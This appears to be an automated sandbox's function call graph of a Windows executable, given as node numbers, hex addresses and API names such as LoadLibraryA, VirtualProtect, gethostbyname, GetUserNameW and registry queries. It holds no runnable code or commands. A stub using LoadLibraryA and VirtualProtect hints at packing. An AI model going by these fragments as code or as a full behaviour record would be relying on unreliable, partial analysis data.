104692->105127 104693 1f14a0 48 API calls 104698 1ef8ab 104693->104698 104694 202241 48 API calls 104694->104699 104696->104693 104698->104692 104701 1ef9d8 104698->104701 104699->104649 104699->104679 104699->104692 104699->104694 104699->104701 104699->104714 105126 22d520 85 API calls 4 library calls 104701->105126 104714->103936 104718 1e84a6 80 API calls 104717->104718 104719 2410fb LoadLibraryW 104718->104719 104720 24111e 104719->104720 104722 24110f 104719->104722 104720->104722 105207 2428d9 48 API calls _memmove 104720->105207 104722->103936 105208 236b19 104723->105208 104726 2380a5 104727 1e3320 48 API calls 104726->104727 104728 2380b3 104727->104728 105213 1f2320 50 API calls 104728->105213 104730 238102 104731 1ecdb4 48 API calls 104730->104731 104736 2380f5 104730->104736 104733 23812b 104731->104733 104735 1ecdb4 48 API calls 104733->104735 104733->104736 104735->104736 104736->103936 104738 20010a 48 API calls 104737->104738 104739 1e50b3 104738->104739 104740 1e50ec CloseHandle 104739->104740 104741 1e50be 104740->104741 104741->103936 105215 1e19ee 104742->105215 104757 1e19ee 82 API calls 104756->104757 104758 24799b 104757->104758 104759 1e1dce 106 API calls 104758->104759 104760 2479a4 104759->104760 104760->103936 105377 23f79f 104761->105377 104763 240c0a 104763->103936 104765 1ff47f 104764->104765 104766 1ff48a 104764->104766 104767 1ecdb4 48 API calls 104765->104767 104769 1e84a6 80 API calls 104766->104769 104790 1ff498 Mailbox 104766->104790 104767->104766 104768 20010a 48 API calls 104770 1ff49f 104768->104770 104771 256841 104769->104771 104772 1ff4af 104770->104772 105452 1e5080 49 API calls 104770->105452 105453 20297d 104771->105453 104776 1e84a6 80 API calls 104772->104776 104778 1ff4bf 104776->104778 104790->104768 104800 1ff50a Mailbox 104790->104800 104800->103936 104803 230157 104802->104803 104804 23015e 104802->104804 104806 1e84a6 80 API calls 104803->104806 104805 1e84a6 80 API calls 104804->104805 104805->104803 104807 23017c 104806->104807 105485 2276db GetFileVersionInfoSizeW 104807->105485 104809 23018d 104810 230192 104809->104810 104812 2301a3 _wcscmp 104809->104812 104816 1ea6d4 48 API calls 104815->104816 104817 2392d2 104816->104817 104818 1e84a6 80 API calls 104817->104818 104819 2392e1 104818->104819 104820 1ff26b 50 API calls 104819->104820 104821 2392ed gethostbyname 104820->104821 104822 2392fa WSAGetLastError 104821->104822 104823 23931d _memmove 104821->104823 104834 1e84a6 80 API calls 104833->104834 104835 2417c7 104834->104835 104836 226f5b 63 API calls 104835->104836 104837 2417d8 104836->104837 104837->103936 104839 1ecdb4 48 API calls 104838->104839 104840 23938a 104839->104840 104841 1ecdb4 48 API calls 104840->104841 104842 23939a 104841->104842 104843 1eca8e 48 API calls 104842->104843 104844 2393a9 104843->104844 104845 2393c2 select 104844->104845 104861 2393ae Mailbox _memmove 104844->104861 104861->103936 104867 1e84a6 80 API calls 104866->104867 104868 23913f 104867->104868 104869 1ecdb4 48 API calls 104868->104869 104870 239149 104869->104870 105506 23acd3 104870->105506 104881 1eca8e 48 API calls 104880->104881 104882 2430ca 104881->104882 104883 1ed3d2 48 API calls 104882->104883 104884 2430d3 104883->104884 104885 1ed3d2 48 API calls 104884->104885 104886 2430dc 104885->104886 104887 1ed3d2 48 API calls 104886->104887 104930 1e84a6 80 API calls 104929->104930 104931 1e81e5 104930->104931 104932 1e84a6 80 API calls 104931->104932 104933 1e81fa 104932->104933 104934 1e84a6 80 API calls 104933->104934 104935 1e820d 104934->104935 104936 1e84a6 80 API calls 104935->104936 105000 1eca8e 48 API calls 104999->105000 105001 1fef25 105000->105001 105002 1fef3e 105001->105002 105003 1feffb 105001->105003 105573 1ff0f3 48 API calls 105002->105573 105004 20010a 48 API calls 105003->105004 105006 1ff002 105004->105006 105007 1ff00e 105006->105007 105575 1e5080 49 API calls 105006->105575 105009 1e84a6 80 API calls 105007->105009 105010 1fef73 105015 1ff03e 2 API calls 105010->105015 105011 1fef4d 105011->105010 105012 256942 105011->105012 105013 1ecdb4 48 API calls 105011->105013 105012->103936 105016 256965 105013->105016 105016->105010 105043 1ff0b5 2 API calls 105042->105043 105044 1ff046 105043->105044 105044->103936 105046 1eca8e 48 API calls 105045->105046 105047 23b7a3 CoInitialize 105046->105047 105048 23b7ae CoUninitialize 105047->105048 105050 23b7b4 105047->105050 105048->105050 105049 23b7d5 105052 23b81b 105049->105052 105054 1e84a6 80 API calls 105049->105054 105050->105049 105051 1eca8e 48 API calls 105050->105051 105051->105049 105053 1e84a6 80 API calls 105052->105053 105055 23b827 105053->105055 105056 23b7ef 105054->105056 105602 21a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 105056->105602 105609 1fdd92 GetFileAttributesW 105086->105609 105089->103936 105090->103936 105091->103936 105092->103936 105093->103936 105094->103931 105095->103928 105096->103909 105097->103904 105098->103913 105099->103922 105101 1ed3d2 48 API calls 105100->105101 105102 23f389 Mailbox 105101->105102 105104 23f3e1 105102->105104 105105 23f3cd 105102->105105 105119 23f3a9 105102->105119 105123->104660 105124->104692 105125->104692 105126->104714 105127->104692 105128->104661 105129->104714 105130->104714 105131->104676 105136->104670 105137->104686 105138->104690 105207->104722 105209 236b42 105208->105209 105210 236b25 GetWindowRect 105208->105210 105211 236b5c 105209->105211 105212 236b52 ClientToScreen 105209->105212 105210->105211 105211->104726 105211->104730 105212->105211 105216 1ed89e 50 API calls 105215->105216 105217 1e1a08 105216->105217 105218 25db7d 105217->105218 105219 1e1a12 105217->105219 105221 1e7e53 48 API calls 105218->105221 105220 1e84a6 80 API calls 105219->105220 105222 1e1a1f 105220->105222 105223 25db8d 105221->105223 105224 1ec935 48 API calls 105222->105224 105223->105223 105378 1e84a6 80 API calls 105377->105378 105379 23f7db 105378->105379 105390 23f81d Mailbox 105379->105390 105413 240458 105379->105413 105390->104763 105414 1eb8a7 48 API calls 105413->105414 105415 240473 CharLowerBuffW 105414->105415 105416 23267a 60 API calls 105415->105416 105452->104772 105459 2029c7 105453->105459 105460 2029e2 105459->105460 105463 2029d6 105459->105463 105463->105460 105486 227700 105485->105486 105496 2276f9 _wcsncpy 105485->105496 105487 20010a 48 API calls 105486->105487 105488 227706 GetFileVersionInfoW 105487->105488 105496->104809 105514 23ae3b 105506->105514 105515 1ea6d4 48 API calls 105514->105515 105573->105011 105575->105007 105610 254a7d FindFirstFileW 105609->105610 105611 1fdd89 105609->105611 105612 254a95 FindClose 105610->105612 105613 254a8e 105610->105613 105611->103936 105613->105612 105615 2279e9 105614->105615 105619 2279d0 105614->105619 105621 20224a 58 API calls __wcstoi64 105615->105621 105617 2279ef 105617->103965 105619->105615 105619->105617 105620 2022df GetStringTypeW wcstoxq 105619->105620 105620->105619 105621->105617 105622 25a0a7 105626 22af66 105622->105626 105624 25a0b2 105625 22af66 83 API calls 105624->105625 105625->105624 105627 22af73 105626->105627 105636 22afa0 105626->105636 105628 22afa2 105627->105628 105629 22afa7 105627->105629 105634 22af9a 105627->105634 105627->105636 105647 1ff833 80 API calls 105628->105647 105631 1e84a6 80 API calls 105629->105631 105632 22afae 105631->105632 105637 1e7b4b 105632->105637 105646 1f4265 61 API calls _memmove 105634->105646 105636->105624 105638 1e7b5d 105637->105638 105639 25240d 105637->105639 105648 1ebbd9 105638->105648 105654 21c0a2 48 API calls _memmove 105639->105654 105642 1e7b69 105642->105636 105643 252417 105644 1ec935 48 API calls 105643->105644 105645 25241f Mailbox 105644->105645 105646->105636 105647->105629 105649 1ebbe7 105648->105649 105651 1ebc0d _memmove 105648->105651 105650 20010a 48 API calls 105649->105650 105649->105651 105652 1ebc5c 105650->105652 105651->105642 105653 20010a 48 API calls 105652->105653 105653->105651 105654->105643 105655 25c146 GetUserNameW 105656 3430b0 105657 3430c0 105656->105657 105658 3431da LoadLibraryA 105657->105658 105663 34321f VirtualProtect VirtualProtect 105657->105663 105659 3431f1 105658->105659 105659->105657 105662 343203 6C1F6DE0 105659->105662 105661 343284 105661->105661 105662->105659 105664 343219 ExitProcess 105662->105664 105663->105661 105665 1f1118 105731 1fe016 105665->105731 105667 1f112e 105668 1f1148 105667->105668 105669 25abeb 105667->105669 105671 1f3680 405 API calls 105668->105671 105745 1fcf79 49 API calls 105669->105745 105705 1efad8 Mailbox _memmove 105671->105705 105673 25b628 Mailbox 105674 25ac2a 105676 25ac4a Mailbox 105674->105676 105746 22ba5d 48 API calls 105674->105746 105749 22d520 85 API calls 4 library calls 105676->105749 105678 1f0119 105752 22d520 85 API calls 4 library calls 105678->105752 105679 1f105e 105686 1ec935 48 API calls 105679->105686 105681 1f0dee 105687 1ed89e 50 API calls 105681->105687 105683 1f0dfa 105690 1ed89e 50 API calls 105683->105690 105684 25b772 105753 22d520 85 API calls 4 library calls 105684->105753 105685 1f1063 105751 22d520 85 API calls 4 library calls 105685->105751 105702 1efbf1 Mailbox 105686->105702 105687->105683 105688 1ec935 48 API calls 105688->105705 105692 1f0e83 105690->105692 105691 1ef6d0 405 API calls 105691->105705 105697 1ecaee 48 API calls 105692->105697 105693 1ed3d2 48 API calls 105693->105705 105695 25b7d2 105696 201b2a 52 API calls __cinit 105696->105705 105709 1f10f1 Mailbox 105697->105709 105700 1f1230 105700->105702 105750 22d520 85 API calls 4 library calls 105700->105750 105703 20010a 48 API calls 105703->105705 105704 1efa40 405 API calls 105704->105705 105705->105678 105705->105679 105705->105681 105705->105683 105705->105684 105705->105685 105705->105688 105705->105691 105705->105692 105705->105693 105705->105696 105705->105700 105705->105702 105705->105703 105705->105704 105708 25b583 105705->105708 105705->105709 105711 21a599 InterlockedDecrement 105705->105711 105712 239122 90 API calls 105705->105712 105713 1ff03e 2 API calls 105705->105713 105714 2410e5 81 API calls 105705->105714 105715 2392c0 87 API calls 105705->105715 105716 238065 55 API calls 105705->105716 105717 23b74b 405 API calls 105705->105717 105718 2430ad 89 API calls 105705->105718 105719 24798d 108 API calls 105705->105719 105720 24804e 112 API calls 105705->105720 105721 23936f 55 API calls 105705->105721 105722 2417aa 86 API calls 105705->105722 105723 1fef0d 93 API calls 105705->105723 105724 1e81c6 84 API calls 105705->105724 105725 1fdd84 3 API calls 105705->105725 105726 23013f 86 API calls 105705->105726 105727 241f19 129 API calls 105705->105727 105728 1e50a3 49 API calls 105705->105728 105729 1ff461 97 API calls 105705->105729 105730 240bfa 128 API calls 105705->105730 105740 1f1620 59 API calls Mailbox 105705->105740 105741 23ee52 81 API calls 2 library calls 105705->105741 105742 23ef9d 89 API calls Mailbox 105705->105742 105743 22b020 48 API calls 105705->105743 105744 23e713 405 API calls Mailbox 105705->105744 105747 22d520 85 API calls 4 library calls 105708->105747 105748 22d520 85 API calls 4 library calls 105709->105748 105711->105705 105712->105705 105713->105705 105714->105705 105715->105705 105716->105705 105717->105705 105718->105705 105719->105705 105720->105705 105721->105705 105722->105705 105723->105705 105724->105705 105725->105705 105726->105705 105727->105705 105728->105705 105729->105705 105730->105705 105732 1fe034 105731->105732 105733 1fe022 105731->105733 105734 1fe03a 105732->105734 105735 1fe063 105732->105735 105736 1ed89e 50 API calls 105733->105736 105737 20010a 48 API calls 105734->105737 105738 1ed89e 50 API calls 105735->105738 105739 1fe02c 105736->105739 105737->105739 105738->105739 105739->105667 105740->105705 105741->105705 105742->105705 105743->105705 105744->105705 105745->105674 105746->105676 105747->105709 105748->105702 105749->105673 105750->105685 105751->105678 105752->105684 105753->105695 105754 251eed 105759 1fe975 105754->105759 105756 251f01 105775 201b2a 52 API calls __cinit 105756->105775 105758 251f0b 105760 20010a 48 API calls 105759->105760 105761 1fea27 GetModuleFileNameW 105760->105761 105762 20297d __wsplitpath 47 API calls 105761->105762 105763 1fea5b _wcsncat 105762->105763 105776 202bff 105763->105776 105766 20010a 48 API calls 105767 1fea94 _wcscpy 105766->105767 105768 1ed3d2 48 API calls 105767->105768 105769 1feacf 105768->105769 105779 1feb05 105769->105779 105771 1feae0 Mailbox 105771->105756 105772 1ea4f6 48 API calls 105774 1feada _wcscat __wsetenvp _wcsncpy 105772->105774 105773 20010a 48 API calls 105773->105774 105774->105771 105774->105772 105774->105773 105775->105758 105792 20aab9 105776->105792 105780 1ec4cd 48 API calls 105779->105780 105781 1feb14 RegOpenKeyExW 105780->105781 105782 254b17 RegQueryValueExW 105781->105782 105783 1feb35 105781->105783 105784 254b30 105782->105784 105790 254b86 105782->105790 105783->105774 105785 20010a 48 API calls 105784->105785 105786 254b49 105785->105786 105787 1e4bce 48 API calls 105786->105787 105788 254b53 RegQueryValueExW 105787->105788 105789 254b6f 105788->105789 105788->105790 105791 1e7e53 48 API calls 105789->105791 105791->105790 105793 20abc6 105792->105793 105794 20aaca 105792->105794 105802 20889e 47 API calls __getptd_noexit 105793->105802 105794->105793 105800 20aad5 105794->105800 105796 20abbb 105803 207aa0 8 API calls __wmakepath_s 105796->105803 105799 1fea8a 105799->105766 105800->105799 105801 20889e 47 API calls __getptd_noexit 105800->105801 105801->105796 105802->105796 105803->105799 105804 1f0ff7 105805 1fe016 50 API calls 105804->105805 105806 1f100d 105805->105806 105862 1fe08f 105806->105862 105811 1f105e 105819 1ec935 48 API calls 105811->105819 105812 20010a 48 API calls 105842 1efad8 Mailbox _memmove 105812->105842 105813 1f0dee 105820 1ed89e 50 API calls 105813->105820 105815 1f0dfa 105822 1ed89e 50 API calls 105815->105822 105816 25b772 105884 22d520 85 API calls 4 library calls 105816->105884 105817 1f0119 105883 22d520 85 API calls 4 library calls 105817->105883 105818 1f1063 105882 22d520 85 API calls 4 library calls 105818->105882 105830 1efbf1 Mailbox 105819->105830 105820->105815 105821 1ec935 48 API calls 105821->105842 105824 1f0e83 105822->105824 105823 1ef6d0 405 API calls 105823->105842 105829 1ecaee 48 API calls 105824->105829 105826 21a599 InterlockedDecrement 105826->105842 105827 1ed3d2 48 API calls 105827->105842 105828 25b7d2 105838 1f10f1 Mailbox 105829->105838 105832 201b2a 52 API calls __cinit 105832->105842 105834 1f103d 105834->105830 105881 22d520 85 API calls 4 library calls 105834->105881 105836 1efa40 405 API calls 105836->105842 105880 22d520 85 API calls 4 library calls 105838->105880 105840 25b583 105879 22d520 85 API calls 4 library calls 105840->105879 105842->105811 105842->105812 105842->105813 105842->105815 105842->105816 105842->105817 105842->105818 105842->105821 105842->105823 105842->105824 105842->105826 105842->105827 105842->105830 105842->105832 105842->105834 105842->105836 105842->105838 105842->105840 105843 239122 90 API calls 105842->105843 105844 1ff03e 2 API calls 105842->105844 105845 2410e5 81 API calls 105842->105845 105846 2392c0 87 API calls 105842->105846 105847 238065 55 API calls 105842->105847 105848 23b74b 405 API calls 105842->105848 105849 2430ad 89 API calls 105842->105849 105850 24798d 108 API calls 105842->105850 105851 24804e 112 API calls 105842->105851 105852 23936f 55 API calls 105842->105852 105853 2417aa 86 API calls 105842->105853 105854 1fef0d 93 API calls 105842->105854 105855 1e81c6 84 API calls 105842->105855 105856 1fdd84 3 API calls 105842->105856 105857 23013f 86 API calls 105842->105857 105858 241f19 129 API calls 105842->105858 105859 1e50a3 49 API calls 105842->105859 105860 1ff461 97 API calls 105842->105860 105861 240bfa 128 API calls 105842->105861 105874 1f1620 59 API calls Mailbox 105842->105874 105875 23ee52 81 API calls 2 library calls 105842->105875 105876 23ef9d 89 API calls Mailbox 105842->105876 105877 22b020 48 API calls 105842->105877 105878 23e713 405 API calls Mailbox 105842->105878 105843->105842 105844->105842 105845->105842 105846->105842 105847->105842 105848->105842 105849->105842 105850->105842 105851->105842 105852->105842 105853->105842 105854->105842 105855->105842 105856->105842 105857->105842 105858->105842 105859->105842 105860->105842 105861->105842 105863 1e7b6e 48 API calls 105862->105863 105864 1fe0b4 _wcscmp 105863->105864 105865 1ecaee 48 API calls 105864->105865 105868 1fe0e2 Mailbox 105864->105868 105866 25b9c7 105865->105866 105867 1e7b4b 48 API calls 105866->105867 105869 25b9d5 105867->105869 105868->105842 105870 1ed2d2 53 API calls 105869->105870 105871 25b9e7 105870->105871 105872 1ed89e 50 API calls 105871->105872 105873 25b9ec Mailbox 105871->105873 105872->105873 105873->105842 105874->105842 105875->105842 105876->105842 105877->105842 105878->105842 105879->105838 105880->105830 105881->105818 105882->105817 105883->105816 105884->105828 105885 251e8b 105890 1fe44f 105885->105890 105889 251e9a 105891 20010a 48 API calls 105890->105891 105892 1fe457 105891->105892 105893 1fe46b 105892->105893 105898 1fe74b 105892->105898 105897 201b2a 52 API calls __cinit 105893->105897 105897->105889 105899 1fe463 105898->105899 105900 1fe754 105898->105900 105902 1fe47b 105899->105902 105930 201b2a 52 API calls __cinit 105900->105930 105903 1ed3d2 48 API calls 105902->105903 105904 1fe492 GetVersionExW 105903->105904 105905 1e7e53 48 API calls 105904->105905 105906 1fe4d5 105905->105906 105931 1fe5f8 105906->105931 105909 1fe617 48 API calls 105913 1fe4e9 105909->105913 105912 2529f9 105913->105912 105935 1fe6d1 105913->105935 105914 1fe55f GetCurrentProcess 105944 1fe70e LoadLibraryA 6C1F6DE0 105914->105944 105915 1fe576 105917 1fe59e 105915->105917 105918 1fe5ec GetSystemInfo 105915->105918 105938 1fe694 105917->105938 105919 1fe5c9 105918->105919 105921 1fe5dc 105919->105921 105922 1fe5d7 FreeLibrary 105919->105922 105921->105893 105922->105921 105924 1fe5e4 GetSystemInfo 105926 1fe5be 105924->105926 105925 1fe5b4 105941 1fe437 105925->105941 105926->105919 105928 1fe5c4 FreeLibrary 105926->105928 105928->105919 105930->105899 105932 1fe601 105931->105932 105933 1ea2fb 48 API calls 105932->105933 105934 1fe4dd 105933->105934 105934->105909 105945 1fe6e3 105935->105945 105949 1fe6a6 105938->105949 105942 1fe694 2 API calls 105941->105942 105943 1fe43f GetNativeSystemInfo 105942->105943 105943->105926 105944->105915 105946 1fe55b 105945->105946 105947 1fe6ec LoadLibraryA 105945->105947 105946->105914 105946->105915 105947->105946 105948 1fe6fd 6C1F6DE0 105947->105948 105948->105946 105950 1fe5ac 105949->105950 105951 1fe6af LoadLibraryA 105949->105951 105950->105924 105950->105925 105951->105950 105952 1fe6c0 6C1F6DE0 105951->105952 105952->105950 105953 251eca 105958 1fbe17 105953->105958 105957 251ed9 105959 1ed3d2 48 API calls 105958->105959 105960 1fbe85 105959->105960 105966 1fc929 105960->105966 105962 1fbf3e 105965 201b2a 52 API calls __cinit 105962->105965 105963 1fbf22 105963->105962 105969 1fc8b7 48 API calls _memmove 105963->105969 105965->105957 105970 1fc955 105966->105970 105969->105963 105971 1fc948 105970->105971 105972 1fc962 105970->105972 105971->105963 105972->105971 105973 1fc969 RegOpenKeyExW 105972->105973 105973->105971 105974 1fc983 RegQueryValueExW 105973->105974 105975 1fc9b9 RegCloseKey 105974->105975 105976 1fc9a4 105974->105976 105975->105971 105976->105975 105977 1ee849 105980 1f26c0 105977->105980 105979 1ee852 105981 1f273b 105980->105981 105982 25862d 105980->105982 105984 1f2adc 105981->105984 105985 1f277c 105981->105985 105994 1f279a 105981->105994 106102 22d520 85 API calls 4 library calls 105982->106102 106101 1ed349 53 API calls 105984->106101 106026 1f28f6 105985->106026 106097 1ed500 53 API calls __cinit 105985->106097 105986 25863e 106103 22d520 85 API calls 4 library calls 105986->106103 105987 1f27cf 105987->105986 105990 1f27db 105987->105990 105988 1f2a84 105997 1ed380 55 API calls 105988->105997 105992 1f27ef 105990->105992 106001 25865a 105990->106001 105995 1f2806 105992->105995 105996 2586c9 105992->105996 105994->105987 105994->105988 106010 1f2914 105994->106010 105998 1efa40 405 API calls 105995->105998 106000 1efa40 405 API calls 105996->106000 106039 258ac9 105996->106039 105999 1f2aab 105997->105999 106007 1f281d 105998->106007 106003 1ed2d2 53 API calls 105999->106003 106004 2586ee 106000->106004 106001->105996 106021 1f29ec 106001->106021 106104 23f211 405 API calls 106001->106104 106105 23f4df 405 API calls 106001->106105 106003->106010 106012 1ed89e 50 API calls 106004->106012 106017 25870a 106004->106017 106004->106021 106006 258980 106113 22d520 85 API calls 4 library calls 106006->106113 106011 1f2836 106007->106011 106016 1ec935 48 API calls 106007->106016 106007->106021 106013 1ecdb4 48 API calls 106010->106013 106015 1efa40 405 API calls 106011->106015 106011->106039 106012->106017 106019 1f296e 106013->106019 106014 1f28cc 106014->106026 106098 1ecf97 58 API calls 106014->106098 106027 1f287c 106015->106027 106016->106011 106020 25878d 106017->106020 106106 1e346e 48 API calls 106017->106106 106019->106021 106023 2589b4 106019->106023 106030 1f2984 106019->106030 106051 258a97 106019->106051 106054 25883f 106020->106054 106066 25882d 106020->106066 106107 224e71 53 API calls __cinit 106020->106107 106021->105979 106022 258725 106057 1f14a0 48 API calls 106022->106057 106022->106066 106083 23bf80 106023->106083 106025 1f28ac 106025->106014 106111 1ecf97 58 API calls 106025->106111 106041 1f2900 106026->106041 106112 1ecf97 58 API calls 106026->106112 106027->106021 106027->106025 106043 1efa40 405 API calls 106027->106043 106030->106051 106099 1f41fc 83 API calls 106030->106099 106031 1eca8e 48 API calls 106031->106054 106032 258888 106032->106007 106036 25888c 106032->106036 106110 22d520 85 API calls 4 library calls 106036->106110 106038 1f29b8 106042 258a7e 106038->106042 106100 1f41fc 83 API calls 106038->106100 106118 22d520 85 API calls 4 library calls 106039->106118 106041->106006 106041->106010 106116 1fee93 83 API calls 106042->106116 106047 2588ff 106043->106047 106047->106021 106056 1ed89e 50 API calls 106047->106056 106048 2589f3 106063 258a01 106048->106063 106064 258a42 106048->106064 106049 2587ca 106050 258813 106049->106050 106055 1e84a6 80 API calls 106049->106055 106053 1ed89e 50 API calls 106050->106053 106051->106021 106117 1e4b02 50 API calls 106051->106117 106052 1f29ca 106052->106021 106059 258a6f 106052->106059 106060 1f29e5 106052->106060 106058 258821 106053->106058 106109 23c235 405 API calls Mailbox 106054->106109 106072 2587e0 106055->106072 106056->106025 106061 25875d 106057->106061 106062 1ed89e 50 API calls 106058->106062 106115 23d1da 50 API calls 106059->106115 106065 20010a 48 API calls 106060->106065 106061->106066 106070 1f14a0 48 API calls 106061->106070 106062->106066 106067 1eca8e 48 API calls 106063->106067 106068 1ed89e 50 API calls 106064->106068 106065->106021 106066->106031 106067->106021 106071 258a4b 106068->106071 106073 258775 106070->106073 106074 1ed89e 50 API calls 106071->106074 106072->106050 106108 22a76d 49 API calls 106072->106108 106077 1ed89e 50 API calls 106073->106077 106078 258a57 106074->106078 106076 258807 106079 1ed89e 50 API calls 106076->106079 106080 258781 106077->106080 106114 1e4b02 50 API calls 106078->106114 106079->106050 106082 1ed89e 50 API calls 106080->106082 106082->106020 106089 23bfd9 _memset 106083->106089 106085 23c22e 106085->106048 106086 23c033 106121 23c235 405 API calls Mailbox 106086->106121 106087 23c14c 106087->106086 106088 23c19f VariantInit VariantClear 106087->106088 106090 23c1c5 106088->106090 106089->106086 106089->106087 106091 23c097 VariantInit 106089->106091 106090->106086 106092 23c1e6 106090->106092 106095 23c0d6 106091->106095 106120 22a6f6 102 API calls 106092->106120 106094 23c20d VariantClear 106094->106085 106095->106086 106119 22a6f6 102 API calls 106095->106119 106097->105994 106098->106026 106099->106038 106100->106052 106101->106025 106102->105986 106103->106001 106104->106001 106105->106001 106106->106022 106107->106049 106108->106076 106109->106032 106110->106021 106111->106014 106112->106041 106113->106021 106114->106021 106115->106042 106116->106051 106117->106039 106118->106021 106119->106087 106120->106094 106121->106085 106122 254ddc 106123 254de6 VariantClear 106122->106123 106124 1f4472 106122->106124 106123->106124 106125 1e29c2 106126 1e29cb 106125->106126 106127 1e2a48 106126->106127 106128 1e29e9 106126->106128 106166 1e2a46 106126->106166 106130 1e2a4e 106127->106130 106131 252307 106127->106131 106132 1e2aac PostQuitMessage 106128->106132 106133 1e29f6 106128->106133 106129 1e2a2b NtdllDefWindowProc_W 106139 1e2a39 106129->106139 106134 1e2a76 SetTimer RegisterClipboardFormatW 106130->106134 106135 1e2a53 106130->106135 106180 1e322e 16 API calls 106131->106180 106132->106139 106137 25238f 106133->106137 106138 1e2a01 106133->106138 106134->106139 106143 1e2a9f CreatePopupMenu 106134->106143 106140 1e2a5a KillTimer 106135->106140 106141 2522aa 106135->106141 106186 2257fb 60 API calls _memset 106137->106186 106144 1e2a09 106138->106144 106145 1e2ab6 106138->106145 106177 1e2b94 Shell_NotifyIconW _memset 106140->106177 106147 2522e3 MoveWindow 106141->106147 106148 2522af 106141->106148 106142 25232e 106181 1fec33 405 API calls Mailbox 106142->106181 106143->106139 106151 252374 106144->106151 106152 1e2a14 106144->106152 106170 1e1e58 106145->106170 106147->106139 106155 2522b3 106148->106155 106156 2522d2 SetFocus 106148->106156 106151->106129 106185 21b31f 48 API calls 106151->106185 106158 1e2a1f 106152->106158 106159 25235f 106152->106159 106153 2523a1 106153->106129 106153->106139 106155->106158 106160 2522bc 106155->106160 106156->106139 106157 1e2a6d 106178 1e2ac7 DeleteObject DestroyWindow Mailbox 106157->106178 106158->106129 106182 1e2b94 Shell_NotifyIconW _memset 106158->106182 106184 225fdb 70 API calls _memset 106159->106184 106179 1e322e 16 API calls 106160->106179 106165 25236f 106165->106139 106166->106129 106168 252353 106183 1e3598 67 API calls _memset 106168->106183 106171 1e1e6f _memset 106170->106171 106172 1e1ef1 106170->106172 106187 1e38e4 106171->106187 106172->106139 106174 1e1eda KillTimer SetTimer 106174->106172 106175 1e1e96 106175->106174 106176 254518 Shell_NotifyIconW 106175->106176 106176->106174 106177->106157 106178->106139 106179->106139 106180->106142 106181->106158 106182->106168 106183->106166 106184->106165 106185->106166 106186->106153 106188 1e39d5 Mailbox 106187->106188 106189 1e3900 106187->106189 106188->106175 106190 1e7b6e 48 API calls 106189->106190 106191 1e390e 106190->106191 106192 1e391b 106191->106192 106193 25453f LoadStringW 106191->106193 106194 1e7e53 48 API calls 106192->106194 106196 254559 106193->106196 106195 1e3930 106194->106195 106195->106196 106197 1e3941 106195->106197 106210 1e39e8 48 API calls 2 library calls 106196->106210 106199 1e39da 106197->106199 106200 1e394b 106197->106200 106201 1ec935 48 API calls 106199->106201 106209 1e39e8 48 API calls 2 library calls 106200->106209 106207 1e3956 _memset _wcscpy 106201->106207 106203 254564 106204 254578 106203->106204 106203->106207 106211 1e39e8 48 API calls 2 library calls 106204->106211 106206 254586 106208 1e39ba Shell_NotifyIconW 106207->106208 106208->106188 106209->106207 106210->106203 106211->106206 106212 25c05b 106213 25c05d 106212->106213 106216 2278ee WSAStartup 106213->106216 106215 25c066 106215->106215 106217 227917 gethostname gethostbyname 106216->106217 106219 2279b1 _wcscpy 106216->106219 106217->106219 106220 22793a _memmove 106217->106220 106218 227952 _wcscpy 106222 2279a9 WSACleanup 106218->106222 106219->106215 106220->106218 106221 227970 inet_ntoa 106220->106221 106223 227989 _strcat 106221->106223 106222->106219 106225 228553 106223->106225 106226 228561 106225->106226 106227 228565 _strlen 106225->106227 106226->106218 106228 228574 MultiByteToWideChar 106227->106228 106228->106226 106229 22858a 106228->106229 106230 20010a 48 API calls 106229->106230 106231 2285a6 MultiByteToWideChar 106230->106231 106231->106226 106232 251edb 106237 1e131c 106232->106237 106234 251ee1 106270 201b2a 52 API calls __cinit 106234->106270 106236 251eeb 106238 1e133e 106237->106238 106271 1e1624 106238->106271 106243 1ed3d2 48 API calls 106244 1e137e 106243->106244 106245 1ed3d2 48 API calls 106244->106245 106246 1e1388 106245->106246 106247 1ed3d2 48 API calls 106246->106247 106248 1e1392 106247->106248 106249 1ed3d2 48 API calls 106248->106249 106250 1e13d8 106249->106250 106251 1ed3d2 48 API calls 106250->106251 106252 1e14bb 106251->106252 106279 1e1673 106252->106279 106256 1e14eb 106257 1ed3d2 48 API calls 106256->106257 106258 1e14f5 106257->106258 106308 1e175e 106258->106308 106260 1e1540 106261 1e1550 GetStdHandle 106260->106261 106262 1e15ab 106261->106262 106263 2558da 106261->106263 106264 1e15b1 CoInitialize 106262->106264 106263->106262 106265 2558e3 106263->106265 106264->106234 106315 229bd1 53 API calls 106265->106315 106267 2558ea 106316 22a2f6 CreateThread 106267->106316 106269 2558f6 CloseHandle 106269->106264 106270->106236 106317 1e17e0 106271->106317 106274 1e7e53 48 API calls 106275 1e1344 106274->106275 106276 1e16db 106275->106276 106331 1e1867 6 API calls 106276->106331 106278 1e1374 106278->106243 106280 1ed3d2 48 API calls 106279->106280 106281 1e1683 106280->106281 106282 1ed3d2 48 API calls 106281->106282 106283 1e168b 106282->106283 106332 1e7d70 106283->106332 106286 1e7d70 48 API calls 106287 1e169b 106286->106287 106288 1ed3d2 48 API calls 106287->106288 106289 1e16a6 106288->106289 106290 20010a 48 API calls 106289->106290 106291 1e14c5 106290->106291 106292 1e16f2 106291->106292 106293 1e1700 106292->106293 106294 1ed3d2 48 API calls 106293->106294 106295 1e170b 106294->106295 106296 1ed3d2 48 API calls 106295->106296 106297 1e1716 106296->106297 106298 1ed3d2 48 API calls 106297->106298 106299 1e1721 106298->106299 106300 1ed3d2 48 API calls 106299->106300 106301 1e172c 106300->106301 106302 1e7d70 48 API calls 106301->106302 106303 1e1737 106302->106303 106304 20010a 48 API calls 106303->106304 106305 1e173e 106304->106305 106306 2524a6 106305->106306 106307 1e1747 RegisterClipboardFormatW 106305->106307 106307->106256 106309 1e176e 106308->106309 106310 2567dd 106308->106310 106312 20010a 48 API calls 106309->106312 106337 22d231 50 API calls 106310->106337 106314 1e1776 106312->106314 106313 2567e8 106314->106260 106315->106267 106316->106269 106338 22a2dc 54 API calls 106316->106338 106324 1e17fc 106317->106324 106320 1e17fc 48 API calls 106321 1e17f0 106320->106321 106322 1ed3d2 48 API calls 106321->106322 106323 1e165b 106322->106323 106323->106274 106325 1ed3d2 48 API calls 106324->106325 106326 1e1807 106325->106326 106327 1ed3d2 48 API calls 106326->106327 106328 1e180f 106327->106328 106329 1ed3d2 48 API calls 106328->106329 106330 1e17e8 106329->106330 106330->106320 106331->106278 106333 1ed3d2 48 API calls 106332->106333 106334 1e7d79 106333->106334 